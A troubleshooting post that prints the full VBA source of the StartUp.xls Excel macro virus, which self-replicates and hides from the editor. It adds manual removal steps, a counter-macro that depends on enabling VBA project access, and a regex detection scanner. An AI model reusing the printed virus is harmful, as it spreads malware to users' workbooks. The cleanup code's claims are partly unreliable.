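Today a friend asked me to look at a problem: whenever an Excel file was opened and then saved, Excel showed the message "This document contains macros, ActiveX controls, XML expansion pack information, or Web components. These may include personal information that cannot be removed by setting the "Remove personal information from file properties on save" option on the "Security" tab of the "Options" dialog box under the "Tools" menu." At first I assumed it was just a settings issue, but after several hours of digging I found that the file was infected with a macro virus named StartUp.xls. Tracking the virus down was also a fairly roundabout process (mainly because my own skills are lacking).
The virus sample is as follows: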
Sub auto_open()
    On Error Resume Next
    ' If this workbook is not in XLSTART and StartUp.xls is not there yet, copy the StartUp sheet there
    If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then
        Application.ScreenUpdating = False
        ThisWorkbook.Sheets("StartUp").Copy
        ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls")
        n$ = ActiveWorkbook.Name
        ActiveWindow.Visible = False
        Workbooks("StartUp.xls").Save
        Workbooks(n$).Close (False)
    End If
    ' Run cop on every sheet activation; redirect Alt+F11 and Alt+F8 to escape
    Application.OnSheetActivate = "StartUp.xls!cop"
    Application.OnKey "%{F11}", "StartUp.xls!escape"
    Application.OnKey "%{F8}", "StartUp.xls!escape"
End Sub

Sub cop()
    On Error Resume Next
    ' Insert the StartUp sheet into any workbook whose first sheet is not StartUp
    If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then
        Application.ScreenUpdating = False
        n$ = ActiveSheet.Name
        Workbooks("StartUp.xls").Sheets("StartUp").Copy before:=Worksheets(1)
        Sheets(n$).Select
    End If
End Sub

Sub back()
    On Error Resume Next
    ' Re-install the hooks and reopen StartUp.xls from XLSTART
    Application.OnKey "%{F8}", "StartUp.xls!escape"
    Application.OnKey "%{F11}", "StartUp.xls!escape"
    Application.OnSheetActivate = "StartUp.xls!cop"
    Application.OnTime Now + TimeValue("00:00:01"), "StartUp.xls!cop"
    Workbooks.Open Application.StartupPath & "\StartUp.xls"
End Sub

Sub escape()
    On Error Resume Next
    ' Called when the user presses Alt+F11 or Alt+F8: restore the keys, pass the
    ' keystroke on, and remove the StartUp sheet from the open workbooks first
    Application.OnSheetActivate = "StartUp.xls!back"
    Application.OnKey "%{F11}"
    Application.OnKey "%{F8}"
    Application.SendKeys "%{F11}"
    Application.SendKeys "%{F8}"
    For Each book In Workbooks
        Application.DisplayAlerts = False
        If book.Name <> "StartUp.xls" Then book.Sheets("StartUp").Delete
    Next
    For Each book In Workbooks
        If book.Name = "StartUp.xls" Then
            book.Close
        End If
    Next
End Sub
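Drawing on some material found online, I handled it with the following steps, which remove the virus and also clean infected files once they are modified and saved (some people online say that removing it directly with 360 or Kaspersky leaves the files unable to open; I have not tested this, so I do not know whether it is true):
1. Delete C:\Documents and Settings\Administrator\Application Data\Microsoft\Excel\Excel11.xls; Excel recreates this file automatically after it is deleted;
2. Delete C:\Documents and Settings\Administrator\Application Data\Microsoft\Excel\XLSTART\StartUp.xls;
3. Create a new, empty StartUp.xls and record a macro (record anything; the only purpose is to be able to open the VBA editor);
4. Under "Tools -> Macro -> Macros", select the macro you just recorded, choose "Edit", select all of the content, and replace it with the following: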
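Sub auto_open()
    On Error Resume Next
    Application.ScreenUpdating = False
    ActiveWindow.Visible = False
    n$ = ActiveWorkbook.Name
    Workbooks(n$).Close (False)
    ' Take over the hook name the virus uses, so that this cop runs instead of the virus's
    Application.OnSheetActivate = "StartUp.xls!cop"
End Sub

Sub cop()
    On Error Resume Next
    Dim VBC As Object
    Dim Name As String
    ' Dim delComponent As VBComponent
    ' (code posted online includes the line above; in my testing it causes a compile error. VBA has no VBComponent object)
    Name = "StartUp"
    ' Remove the component named StartUp from every open workbook.
    ' The Workbook property is VBProject; access to it requires
    ' "Trust access to Visual Basic Project" in the macro security settings.
    For Each book In Workbooks
        Set delComponent = book.VBProject.VBComponents(Name)
        book.VBProject.VBComponents.Remove delComponent
    Next
End Sub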
5. Save; then open an infected document, modify it and save it, and the virus it carries is removed.
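The behaviours that identify the sample above (copying itself to Application.StartupPath, hooking OnSheetActivate, and remapping Alt+F11/Alt+F8) can be checked for in macro source that has been exported as text. The scanner below is an added example, not part of the original post; the rule names, verdict labels and the two embedded excerpts are constructed for illustration.

```python
import re

# Behaviours of the StartUp.xls sample on this page, as regexes over VBA source.
# Rule names and verdict labels are this example's own (assumptions).
RULES = {
    "auto_open": re.compile(r"\bSub\s+auto_open\s*\(", re.I),
    "copies_to_startup_path": re.compile(r"\bSaveAs\s*\(?\s*Application\.StartupPath", re.I),
    "hooks_sheet_activate": re.compile(r"\bApplication\.OnSheetActivate\s*=", re.I),
    # OnKey with a second argument remaps the key; with one argument it only
    # restores the default, so a comma is required. %{F11}/%{F8} = Alt+F11/Alt+F8.
    "traps_editor_keys": re.compile(r'\bApplication\.OnKey\s+"%\{F(?:8|11)\}"\s*,', re.I),
}

def scan_macro(source):
    """Return {rule name: [1-based line numbers]} for every rule that matches."""
    hits = {}
    for name, pattern in RULES.items():
        lines = [source.count("\n", 0, m.start()) + 1 for m in pattern.finditer(source)]
        if lines:
            hits[name] = lines
    return hits

def verdict(hits):
    """Self-copy plus a persistence hook is the combination the sample shows."""
    replicates = "copies_to_startup_path" in hits
    persists = "hooks_sheet_activate" in hits or "traps_editor_keys" in hits
    if replicates and persists:
        return "startup-xls-like"
    return "review" if replicates or persists else "no-match"

# Constructed inputs: a short excerpt of the sample and of the replacement macro.
INFECTED = r'''Sub auto_open()
On Error Resume Next
ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls")
Application.OnSheetActivate = "StartUp.xls!cop"
Application.OnKey "%{F11}", "StartUp.xls!escape"
End Sub
'''
CLEANER = r'''Sub auto_open()
ActiveWindow.Visible = False
Application.OnSheetActivate = "StartUp.xls!cop"
End Sub
'''

if __name__ == "__main__":
    for label, src in (("infected", INFECTED), ("cleaner", CLEANER)):
        hits = scan_macro(src)
        print(label, verdict(hits), hits)
```

The replacement macro from step 4 reuses the same OnSheetActivate hook name, so it is reported as "review" rather than "no-match"; that is expected on a machine where the cleanup steps have been applied.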